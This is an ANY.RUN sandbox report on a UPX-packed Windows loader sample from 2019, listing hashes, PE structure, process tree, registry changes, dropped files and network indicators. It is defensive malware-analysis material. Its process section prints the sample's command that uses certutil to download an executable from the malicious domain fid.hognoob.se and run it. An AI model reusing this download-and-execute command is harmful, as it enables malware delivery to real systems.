analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b

Full analysis: https://app.any.run/tasks/1ec3402f-58f2-4b66-a61a-e5cdbe5cfcf6
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 17, 2019, 11:40:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

E79C515BA474AB346DBA053D829F9EAB

SHA1:

3BA03A4B857643616DA4A92058D0AA9C862ED1A2

SHA256:

C2B06A6E1487C47E0A9FAED8322C25395D4936618016A851179CB902564AC60B

SSDEEP:

24576:fjUajaNDr2GCikOheBARs/WP1+r9Cdvvm00cBR:LtjaMGPWAcjsn00

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • ophgsf.exe (PID: 3712)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3208)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe (PID: 2852)
    • Changes tracing settings of the file or console

      • c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe (PID: 2852)
    • Creates files in the user directory

      • c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe (PID: 2852)
    • Executable content was dropped or overwritten

      • c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe (PID: 2852)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (39.5)
.exe | UPX compressed Win32 Executable (38.7)
.dll | Win32 Dynamic Link Library (generic) (9.4)
.exe | Win32 Executable (generic) (6.4)
.exe | Generic Win/DOS Executable (2.8)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x4dcb0
UninitializedDataSize: 225280
InitializedDataSize: 4096
CodeSize: 90112
LinkerVersion: 6
PEType: PE32
TimeStamp: 2019:07:01 20:20:42+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 01-Jul-2019 18:20:42

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F8

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 01-Jul-2019 18:20:42
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
0x00001000
0x00037000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
UPX1
0x00038000
0x00016000
0x00016000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.91751
UPX2
0x0004E000
0x00001000
0x00000400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
2.91703

Imports

ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.DLL
RASAPI32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WINSPOOL.DRV
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
drop and start start c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe ophgsf.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2852"C:\Users\admin\AppData\Local\Temp\c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe" C:\Users\admin\AppData\Local\Temp\c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3712C:\WebKitsSdk\2.7.92\ophgsf.exeC:\WebKitsSdk\2.7.92\ophgsf.exec2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Wzd MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3208cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/upnpprhost.exe %SystemRoot%\Temp\upnpprhost.exe & %SystemRoot%\Temp\upnpprhost.exeC:\Windows\system32\cmd.exec2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3868certutil.exe -urlcache -split -f http://fid.hognoob.se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
61
Read events
43
Write events
18
Delete events
0

Modification events

(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2852) c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
4294901760
Executable files
1
Suspicious files
0
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
3712ophgsf.exe\Device\HarddiskVolume2\Users\admin\AppData\Local\VirtualStore\Windows\System32\1108734.bak
MD5:
SHA256:
2852c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeC:\WebKitsSdk\2.7.92\upnpprhost.exe
MD5:
SHA256:
2852c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeC:\Users\admin\AppData\Local\Temp\1138796\....\TemporaryFile
MD5:
SHA256:
2852c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeC:\Users\admin\AppData\Local\Temp\1138796\TemporaryFile
MD5:
SHA256:
2852c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeC:\WebKitsSdk\2.7.92\ophgsf.exeexecutable
MD5:DAA7A0EDE819014AD57091285763658F
SHA256:C948F21C9892FCB1E10C4EA1FA79CD4E5766064924B71636664896C3782ED27C
2852c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2852
c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe
GET
107.174.20.105:80
http://fid.hognoob.se/upnpprhost.exe
US
malicious
3868
certutil.exe
GET
107.174.20.105:80
http://fid.hognoob.se/upnpprhost.exe
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3868
certutil.exe
107.174.20.105:80
fid.hognoob.se
Nexeon Technologies, Inc.
US
suspicious
2852
c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe
107.174.20.105:80
fid.hognoob.se
Nexeon Technologies, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
fid.hognoob.se
  • 107.174.20.105
malicious

Threats

PID
Process
Class
Message
2852
c2b06a6e1487c47e0a9faed8322c25395d4936618016a851179cb902564ac60b.exe
Potential Corporate Privacy Violation
ET POLICY Unsupported/Fake Windows NT Version 5.0
No debug info